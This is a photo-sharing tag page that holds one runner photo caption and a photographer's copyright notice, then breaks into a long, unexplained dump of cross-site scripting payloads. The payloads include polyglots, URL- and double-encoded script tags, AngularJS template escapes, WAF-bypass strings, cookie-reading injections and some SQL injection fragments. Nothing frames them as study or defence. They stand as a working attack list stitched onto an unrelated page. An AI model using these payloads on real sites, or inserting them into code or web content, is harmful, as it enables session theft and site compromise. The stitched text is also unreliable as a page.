View allAll Photos Tagged BeAlert
Runner crossing street with red traffic lights silhouetted at sunset
All my photographs are copyright protected, If you wish to use my photos please contact me and we can discuss usage fees.
©Jim Corwin_All Rights Reserved 2018 Contact me at jimcorwin@live.com or visit my PhotoShelter site using the link Jim Corwin Photography on my Profile Page.
My website is jimcorwin.photoshelter.com
My E-Mail Address is jscorwin@mac.com
<body onload=alert('ibrahimxss')>""`${alert(1)}`
${alert(1)}
${document.domain}`%26it;/script>'>
{{$el.innerHTML='\u003cimg src onerror=alert(1)\u003e'}}
{{$emit.constructor`alert(1)`()}}
{{$eval.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{$on.constructor('alert("CodePrefer")')()}}
$("script(2)")
$ prompt(1)alert(1)
'-alert(1)-'
'<00 foo="XSS-jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e
\x3csVg/\x3e">
\x3csVg/\x3e'>
\x3csVg/\x3e>
click me
<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e-->
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e
var str = 'jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e';
var str = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e";
String.raw`jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e`;
var re = /jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e/;
//jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e
/*jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e*/
//\x3csVg/\x3e
javascript:"/*'/*`/*-->
javascript:"/*'//`//\"///<i
javascript:alert()//'/*`/*"/**/;alert()//%0D%0A-->'>"><svg/oNloAd=alert()>\";alert()//
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e
'''jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk={callback} )//%0D%0A%0d%0a//\x3csVg/\x3e''',
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e
” *
@im\port'\ja\vasc\ript:alert("XSS")';
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e
avascript:/*"/*'/*\"/*`/*><alert()<\ /**/alert()//
javascript:'/*`/*'/*"/*\"/*//
javascript:new%20Function`al\ert\`1\``;
javascript:"/*\"/*'/*`/*--><
javascript:"/*'/*`/*-->
javascript:"/*'/*`/*-->
#jaVasCript:/*-/*/*\/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\\x3csVg/\\x3e
#jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\\x3csVg/\\x3e
<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e-->
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//\x3csVg/\x3e
jaVasCript:\/*-\/*`\/*\\`\/*\'\/*\"\/**\/(\/* *\/oNcliCk=alert() )\/\/%0D%0A%0D%0A\/\/<\/stYle\/<\/titLe\/<\/teXtarEa\/<\/scRipt\/--!>\\x3csVg\/\\x3e
jaVasCript:\\\/*-\\\/*`\\\/*\\\\`\\\/*\\\'\\\/*\\\"\\\/**\\\/(\\\/* *\\\/oNcliCk=alert() )\\\/\\\/%0D%0A%0D%0A\\\/\\\/<\\\/stYle\\\/<\\\/titLe\\\/<\\\/teXtarEa\\\/<\\\/scRipt\\\/--!>\\\\x3csVg\\\/\\\\x3e
jaVasCript:\\\\\\\/*-\\\\\\\/*`\\\\\\\/*\\\\\\\\`\\\\\\\/*\\\\\\\'\\\\\\\/*\\\\\\\"\\\\\\\/**\\\\\\\/(\\\\\\\/* *\\\\\\\/oNcliCk=alert() )\\\\\\\/\\\\\\\/%0D%0A%0D%0A\\\\\\\/\\\\\\\/<\\\\\\\/stYle\\\\\\\/<\\\\\\\/titLe\\\\\\\/<\\\\\\\/teXtarEa\\\\\\\/<\\\\\\\/scRipt\\\\\\\/--!>\\\\\\\\x3csVg\\\\\\\/\\\\\\\\x3e
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e
jaVasCript:/*`/*\`/*'/*\"//"/**/(onload=alert())//
javascript:"/*'/*`/*-->
javascript:"/*'/*`/*\" /*
javascript:"/*\"/*`/*' /*-->
javascript:`//"//\"//`
javascript:`/*\"/*-->`
javascript:"/*'//`//\"///
javascript:"/*`/*\"/*'/*/*
javascript:`\"///"//</`
javascript:`\"///"//</`
javascript:/*`//'//\"//-->/
javascript:/*"//'//`//\"//-->//
javascript:/*-->'//"//`//\"///*
javascript:/*"/*'/*`/*\"/*-->/*
javascript:/*"/*'/*\"/*`/*-->//
javascript:/*"/*`/*'/*\"/*--> /*
javascript:"/*'//`//\"//--><alert()<
javascript:alert()"//\"//'//`//-->//
javascript:/*"/*`/*'/*\"/*<
javascript:"/*`/*\"/*' /*<
javascript:/*-->\"[`["[']<///
javascript:"/*\"/*'/*`/*--><
javascript:/*"/*`/*'/*\"/*-->< /**/alert()//<
javascript:"/*\"/*'/*--></*` /*<
javascript:"/*'/*\"/*` /**/alert()//-->alert()
javascript:/*"/*`/*'/*\"/*-->*/ alert()//<
javascript:`/*javascript:/*`/*\"/*'/*"/*<
javascript:alert()//"/*`/*'/*\"/*-->*/ alert()//<alert()<
javascript:alert()//'//"//\"//-->`//*/ alert();//<
javascript:/*"/*\"/*`/*'/**/ (alert())//<
javascript:/*"/*'/*\"/*`/*><alert()<\ /**/alert()//
javascript:/*`/*'/*'/*"-/*\"/**/ alert()//>--><
javascript:'/*`/*'/*"/*\"/*//
javascript:alert()//-->*///\"//`//'//"//> alert()//
javascript:alert()//'//"//\"; '/`/*\/*'/*"/**/(alert())//-->alert()
javascript:/*"/*'/*`/*\"/**/ alert()//*--><
javascript:alert()//\"//`//'//"//-->">*/ alert()//
javascript:alert()//*-->*`/*'/*"/*\"/*/**/ alert()//
jaVasCript:/*`/*\`/*'/*\"//"/**/(onload=alert())//
javascript:alert()//'//"//`//>--><\">alert()//*/ alert()//
javascript:alert()//\ /*-->alert`;alert();`*/alert()//\";alert()//
javascript:alert/*`/*\/*'/*\"/*"/**/(alert())// alert()//-->alert()
javascript:alert();//\" alert();/*`/**/(/**/alert())//alert()<>
javascript:alert()//*/alert()/*'-/"/-eval(`(alert())`)//\"-alert()//-->alert() alert()//
javascript:alert()//\";alert();/*-/*`/*\`/*'/*"/**///--> alert(1)//
javascript:alert()//`;alert()`';alert()//\";alert();//"//-->*/ alert()//*
javascript:alert()//alert()-->\";alert()//";alert()//';alert()//alert()` alert()//*/alert()/*
javascript:alert();//\";alert();//";alert();//';alert();//`;alert();// alert();//*/alert();//--><!--
javascript:/*-->">">alert()+\"; alert()//
javascript:alert(1)//\";alert(1);<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//-->alert(1) alert(1)// CLick00>--%20/
<[%00]img onerror=alert(1) src=a>
%00">alert(1);
%00alert(1)
///%01javascript:alert(document.cookie)/
%09Jav%09ascript:alert(document.domain)
/%09/javascript:alert(1)
/%09/javascript:alert(1);
%0A%0d+select+user+from+dual+%0A%0D
%'});%0aalert(1);%20//
{{0[a='constructor'][a]('alert(1)')()}}
%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)
%0Ajavascript%3Ato%0ap%5B%27ale%27%2B%27rt%27%5D%28top%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%0A/%0A/%0A
0\"autofocus/onfocus=alert(1)-->"-confirm(3)-"
%0D%0A%0D%0A%3Cscript%3E%0D%0A%20alert(1);%0D%0A%3C/script%3E%0D%0A
%0d%0a%0d%0aalert(document.domain)
">%0D%0A%0D%0A
">%0D%0A%0D%0A
>%0D%0A%0D%0A
%0d%0a%20
%0d%0a%20
%0d%0a%20
%0d%0a%20">
%0d%0a%20">
%0d%0a%20javascript:alert(1)
%0d%0a%20alert(1)
%0d%0a%20prompt(document.domain)
%0d%0a%20">
%0d%0aX-XSS-Protection:0%0d%0aContent-Type:%20text/html%0d%0a%0d%0a%3Chtml%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21--
<!--*/!'*/!>%0D<svg/onload=confirm'1'//
_0x68087f:alert(0x1);
0xd3adc0de<ScRiPt>alert('XSS Success!')</sCripT>
0xd3adc0de<ScRiPt>alert('XSS Success!')</sCripT>
')}, 1000); alert('xss')://
')}, 1000);alert("xss");//
10</option></select><img/src=xon=()onx+honerror=alert(1)>ss<svg/onload=prompt(document.domain)%20>
11111';\u006F\u006E\u0065rror=\u0063onfirm; throw'1
1%22onfocus=%27window.alert%28document.cookie%29%27%20autofocus=
123456%22/%3E%3Cmath%3E%3Carchy%20href=Ja%26Tab;vascript%26colon;console.error(1)%3EARCHY%3C/archy%3E%3C/math%3E%3C!--
123')});alert(1);(()=>{('
12&<script>alert(123)</script>=123
1337 '><marquee onstart="[cookie].find(confirm)">
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
1"><%3Csvg onload=alert%28document.cookie%29>'
[][“\146\151\154\164\145\162”][“\143\157\156\163\164\162\165\143\164\157\162”](“\145\166\141\154\50\141\164\157\142\50\42\131\127\170\154\143\156\121\157\115\123\153\75\42\51\51”)()
";[][“\146\151\154\164\145\162”][“\143\157\156\163\164\162\165\143\164\157\162”](“\145\166\141\154\50\141\164\157\142\50\42\131\127\170\154\143\156\121\157\115\123\153\75\42\51\51”)();var+test="
¼script¾alert(¢XSS¢)¼/script¾
1&a%2522%253e%253cscript%253ealert%2528/xss/%2529%253c%252fscript%253e
1'"><A HRef=" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
'1/-alert\5023\51/';
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>>
[1].find(alert)
[1].find(confirm)
1'"><img/src/onerror=.1|alert``>
[1].map(alert) or (alert)(1)
#1&"><script>alert(1)</script>=1
1&"><script>alert(1)</script>=1
1"-->
1
1')"<!--><Svg OnLoad=(confirm)(1)<!--
1'"();<test><iframe onload="window.alert('XSS_WAF_BYPASS')"></iframe>
1'"();<test><ScRiPt>alert("XSS_WAF_BYPASS")</ScRiPt>
1'"();<test><ScRiPt>window.alert("XSS_WAF_BYPASS")</ScRiPt>
1&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1
%20%3Cimg%20src=1%20onerror=alert(1)%3E
%20<body onload=alert("bingo")>
/";%20confirm(1);%20//
%20<img src=1 onerror=alert(1)>
%20<img/src/onerror=alert(coffinxp`)>
%20"><img src=q onerror=alert(1)>
%20"><img src=x onerror=prompt(document.domain);>
%20javascript:alert(1)
%20<script>alert(1)</script>
%20<script>prompt(document.domain)</script>
%20"><svg onload=alert(1)>
%22%20autofocus%20onfocus%00%3d(confirm)(1)%2f%2f
%22%2525%2F%28%29%2C%20alert%281%29%3B%27%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3B%3E%3Cscript%3E
%22%27%3E'><script>alert(2);</script>
%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/d3rk%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fd3rk%F0%9F%98%88%2f%29%3C%21--
%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/Yetixx%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fYetixx%2f%29%3C%21--
%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e
%22%3e%3c%5K/onwheel=alert(1)%3emouse%20wheel%20here%3c%21--
%22%3E%3C%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%29%3B%3E
%22%3E%3Cd3v%2Fonauxclick%3D%5B2%5D.some%28confirm%29%3Eclick
%22%3E%3Cimg%09src%3Dx%09onerror%3Dprompt(document.domain);%3E
%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3B%3E
%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(%22XSS%22)%3E
#%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.cookie%29%3B%3E
%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.cookie%29%3B%3E
%22%3E%3Cimg%20src=x%20onerror=confirm%281%29;%3E
%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain);%3E
%22%3E%3Cimg/src=x/onerro=6%3E%3Cimg/src=%221%22/onerror=alert(1);%3E1
%22%3E%3Cli%20style=list-style:url()%20onerror=javascript:alert(1)%3E%20%3Cdiv%20sty
%22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%3E%3C/object%3E
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%22%3E%3Csvg%20onload%3Dalert%26amp%3B%26amp%3B%23x00000040%221%22%29%3E
%22%3E%3Csvg%20onmouseover%3d%22confirm%26%230000000040document.domain)
%22%3EEnter_Mouse_Pointer_Here_to_get_XSS%3C%5K/onpointerenter=alert(location)%3E%3!
%22%3E'><script>alert(2);</script>
%22-[9].every(alert)-%22//
%22-alert('XSS')-%22
%22})))}catch(e){alert(document.domain);}//
%22-confirm(1)-%22
%22onauxclick=alert`xss`+a
%22onmouseover=window[%27al%27%2B%27er%27%2B([%27t%27,%27b%27,%27c%27][0])](document[%27cooki%27%2B(['e','c','z'][0])]);%22
23;%0adocument.body.innerHTML=location.hash;//#<svg/onload=alert(23)>
~2; "%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E"
%2500%27onmouseover=%27window.stop();alert(document.domain)%27
//%250Aalert?.(1)//
%2522%253E%253Cimg%2520src%253Dx%2520onerror%253Dprompt%2528document.cookie%2529%253B%253E
%2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
%2522%3E%3C%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%29%3B%3E
%25253Cscript%25253Ealert('XSS')%25253C%252Fscript%25253E
%2527%2520onfocus%253D%2527alert%25281%2529%2527%2520
%2527%2520onfocus%253D%2527alert%25281%2529%2527%2520autofocus%253D%2527
%2527%2520onmouseover%253D%2527alert%25281%2529%2527%2520
/%2527)%253B%2520alert(document.cookies)%253B%252F%252F
%2527%253E%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E
%252F%252F%252A%253E%253CScRipt%253Ealert%2528%252FXSS%252F%2529%253C%252FScriPT%253E
%253C%252Fscript%253E%253Cscript%253Ealert%2528%2527XSS%2520here%2521%2527%2529%253C%252Fscript%253E
%253C%2531%2533%2533%253E%253C%2539%253E%253C%2569%253D%2538%253B%253E%253C%253F%256A%2532%253E%253C%252F%2563%253E%253C%252F%2573%2563%2568%2572%2569%2570%2574%253E
%253cimg%20onerror=alert(1)%20src=a%253e
<--%253cimg%20onerror=alert(1)%20src=a%253e --!>
%253Cimg%2520src%253Dx%2520onerror%253Dalert%2528%2529%253E
%253cscript%253ealert(1)%253c/script%253e
%253Cscript%253Ealert(1)%253C/script%253E
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
%253Cscript%253Ealert('XSS')%253C/script%253E
%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
%26%2302java%26%23115cript:alert(document.domain)
%26%23x2f%3B%26%23x2f%3Br4y.pw
#'%26%26'javascript:alert%25281%2529//
'%26%26'javascript:alert%25281%2529//
%26amp%3Blt%3Bscript%26amp%3Bgt%3Balert%281%29%26amp%3Blt%3B%2Fscript%26amp%3Bgt%3B
%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B
%26#x6c;t;\\x73cript>\\u0061lert(1)%26#x6c;t;/\\x73cript>
%27%09);%0d%0a%09%09[1].find(alert)//
%27;%0d%0d});%0d{onerror=prompt}throw document.location</ScRipT//
%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
'%27%3E%27%22%3E%3Cscript%3Ealert(2);%3C/script%3E'
%27%3E%27%3E%22%3E%script%3Ealert(2);%3C/script%3E
%27%3E'><script>alert(2);</script>
%27x%27onclick=%27alert(1)
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
%2f%2a%2a%2f%75%6e%69%6f%6e%2f%2a%2a%2f%73%65%6c%65%63%74
%2F%2F%2A%3E%3CScRipt%3Ealert%28%2FXSS%2F%29%3C%2FScriPT%3E
"%2F><%2Fscript><script>alert%28document.cookie%29<%2Fscript>
%2sscript%2ualert()%2s/script%2u
"><h1/onmouseover='\u0061lert(1)'>
"><h1/onmouseover='\u0061lert(1)'>%00
"><h1/onmouseover='\u0061lert(/AmoloHT/)'>
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
"><track/onerror='confirm\%601\%60'>
"><track/onerror='confirm\%601\%60'>
#'-alert(1)-'
'-alert(1)-'
"%3balert`1`%3b"
%3balert`1`%3b
%3C%25%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%29%3B%3E
%3C%2Fscript%3E%3Cscript%3Econfirm%28document.domain%29%3C%2Fscript%3E
%3C%5K/onpointerenter=alert(1)>
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%7
#%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
%3Cbody%20onload%3D%60alert%28%2FXSS%2F%29%60%3E%3C%2Fbody%3E
%3Cbody%20onload%3D%60alert%28%60XSS%60%29%60%3E
%3Cbutton%20onclick%3D%60alert%28%2FXSS%2F%29%60%3EClick%20me%3C%2Fbutton%3E
%3Cbutton%20onclick%3D%60alert%28%60XSS%60%29%60%3EClick%3C%2Fbutton%3E
%3Cdiv%20style%3D%22width%3A%20expression%28alert%28%2FXSS%2F%29%29%3B%22%3E%3C%2Fdiv%3E
%3Cembed%20src%3D%60javascript%3Aalert%28%60XSS%60%29%60%3E
%3Cform%20action%3D%22javascript%3Aalert%28%2FXSS%2F%29%22%3E%3Cinput%20type%3Dsubmit%3E%3C%2Fform%3E
%3Cform%20action%3D%60javascript%3Aalert%28%60XSS%60%29%60%3E%3Cinput%20type%3Dsubmit%3E%3C%2Fform%3E
%3Chtml%0aonmouseOver%0a=%0a(prompt)``//
%3Ciframe%20src%3D%60javascript%3Aalert%28%60XSS%60%29%60%3E%3C%2Fiframe%3E
"/>%3ciframe%20src%3djavascript%3aalert%283%29%3e
%3Ciframe%20srcdoc%3D%60%3Cscript%3Ealert%28%2FXSS%2F%29%3B%3C%2Fscript%3E%60%3E%3C%2Fiframe%3E
%3Ciframe%20srcdoc%3D%60%3Cscript%3Ealert%28%60XSS%60%29%3C%2Fscript%3E%60%3E%3C%2Fiframe%3E
%3Cimg%20src%3D1%20onerror%3Dalert%281%29%3E
%3Cimg%20src%3Dx%20onerror%3D%60alert%28%2FXSS%2F%29%60%3E
%3Cimg%20src%3Dx%20onerror%3D%60alert%28%60XSS%60%29%60%3E
%3Cimg%20src=x%20onerror=alert(1)%3E
%3Cimg%20src=xx%20onerror=alert(1)%3E
%3cimg onerror=alert(1) src=a%3e
%3Cimg src='null' onerror=alert('spyerror')%3E
%3Cinput%20onfocus%3D%60alert%28%60XSS%60%29%60%3E
%3Cinput%20type%3D%22text%22%20value%3D%22%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E%22%3E
%3Cinput+onfocus%3d%27/*=*/Function(%22ale%22%2b%22rt(document.domain)%22)();//%27autofocus+
%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Burl%3Djavascript%3Aalert%28%2FXSS%2F%29%22%3E
%3Cobject%20data%3D%60javascript%3Aalert%28%60XSS%60%29%60%3E%3C%2Fobject%3E
%3Cscript%0Baaa%3Ealert%281%29%3C/script%3E
%3Cscript%0Caaaaa%3Ealert%28123%29%3C/script%0Caaaaa%3E
%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(/xss/)
%3Cscript%3E%60alert%60%28%2FXSS%2F%29%3B%3C%2Fscript%3E
3Cscript%3Ealert(1)%3C%2Fscript%3E
3Cscript%3Ealert(1)%3C%2Fscript%3E##1
%3cscript%3ealert(1)%3c/script>
%3Cscript%3Ealert(1)%3C/script%00TESTTEST%3E
%3cscript%3ealert(1)%3c/script%3e
%3Cscript%3Ealert(1)%3C/script%3E
%3Cscript%3Ealert(1)%3C/script%3E##1
%3cscript%3ealert%281%29%3b%3c%2fscript%3e
%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2fscript%3E
%3cscript%3ealert()%3c/script>
%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E
#%3Cscript%3Ealert('XSS')%3C%2Fscript%3E
%3Cscript%3Ealert(`xss`)%3C/script%3E
%3Cscript%3Ealert('XSS')%3C/script%3E
%3Cscript%3Efor((TESTXSS)in(self))eval(TESTXSS)(`${`TESTXSS`}`)%3C/script%3E
%3Csvg%20onload%3D%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%28%26%231%3B%29%3E
%3Csvg%20onload%3D%60alert%28%2FXSS%2F%29%60%3E%3C%2Fsvg%3E
%3Csvg%20onload%3D%60alert%28%60XSS%60%29%60%3E
%3Csvg%20onload=alert(1)%3E
%3Csvg%2Fonload%3D'alert%26%2340%2023%20%26%2341'%3E
%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E
%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") >
%3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F
%3csvg/onload=window%5b%22al%22+%22ert%22%5d1337`%3e
%3csvg/onload=window%5b"al"+"ert"%5d`1337`%3e
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
%3Cx/Onpointerrawupdate=confirm%26lpar;)%3Exxxxx
%3E%3Cbody%20onload=javascript:alert(1)%3E
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o
"%3E<img src=x onerror=prompt(document.domain);%3E"
%3E'><script>alert(2);</script>
%3F%20<body onload=alert("bingo")>
%3F%20<img src=1 onerror=alert(1)>
%3F%20<img/src/onerror=alert(coffinxp`)>
%3F%20"><img src=q onerror=alert(1)>
%3F%20"><img src=x onerror=prompt(document.domain);>
%3F%20javascript:alert(1)
%3F%20<script>alert(1)</script>
%3F%20<script>prompt(document.domain)</script>
%3F%20"><svg onload=alert(1)>
444-555-4455 <img src=x onerror=alert(1)>
[45].some.alert()
/*!50000and*/ /*!50000extractvalue*/(0x0a,/*!50000concat(0x0a,(select JSON_OBJECT(1, current_user())))*/)
%5Cu0061%5Cu006C%5Cu0065%5Cu0072%5Cu0074%28%29
%60%2balert/**/(1)%2b%60
<body onload=alert('ibrahimxss')>""
<script>alert(1)</script>
<svg/onload=alert(1)>
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
>'>"<script>alert(2);</script>
%7b%0a%20%20%22%64%61%74%61%22%3a%20%22%7b%74%65%78%74%3a%3c%69%6d%67%2f%73%72%63%3d%78%20%6f%6e%6c%6f%61%64%3d%63%6f%6e%66%69%72%6d%28%31%29%3e%7d%22%2c%0a%20%20%22%65%76%65%6e%74%49%44%22%3a%20%32%33%34%32%33%0a%7d
a<%00meta name="i" HTTP-EQUIV="refresh" CONTENT="0;url=data:text/h%00tml;base64,PHNjcmlwdD5hbGVydCgiT1BFTkJVR0JPVU5UWSIpOzwvc2NyaXB0Pg==">
"><A%20%252F=""Href=%20JavaScript:k='%22',top[k+'lert']('XSS')">
"><A%20%252F=""Href=%20JavaScript:k=%27a%27,top[k%2B%27lert%27](origin)>
(A(%22onerror=%22alert%601%60%22))
(A(%22onerror='alert%60123%60'test))/
(A(%22onerror='alert%601%60'testabcd))/
<a2 onfocus=alert(1) autofocus tabindex=1>
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a>
a=8,b=confirm,c=window,c.onerror=b;throw-a
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a>
aaaaa\”-confirm`1`//
"><a>a</a><img src=x onerror=alert(document.cookie)>{{9-9}}';alert(0);://
"aaa<a href=javas&#99;ript:alert(1)>click"
a'-alert(1)//
a=alert,a(1)
";(a=alert,b=1,a(b))
-(a=alert,b="_Y000!_",[b].find(a))-'
abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
" accesskey='x' onclick='confirm`1`' //
<a @['c\lic\u{6b}']="_c.constructor('alert(1)')()">test</a>
{{'a'.constructor('alert(1)')()}}
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
{{'a'.constructor.constructor('alert(1)')()}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='"+(y='if(!window\u002ex)alert(window\u002ex=1)')+eval(y)+"'");}}}}
<acronym id=x tabindex=1 onfocus=alert(1)></acronym>
<a data-orig-ref="
alert(1)" data-orig-proto="javascript" href="javascript://
alert(1)">clickme</a>
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
<address id=x tabindex=1 onfocus=alert(1)></address>
=a=document.domain;top["al"%2b"ert"](/%2a%2a/a)>
a=document.domain;top["al"%2b"ert"](/%2a%2a/a)>
+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
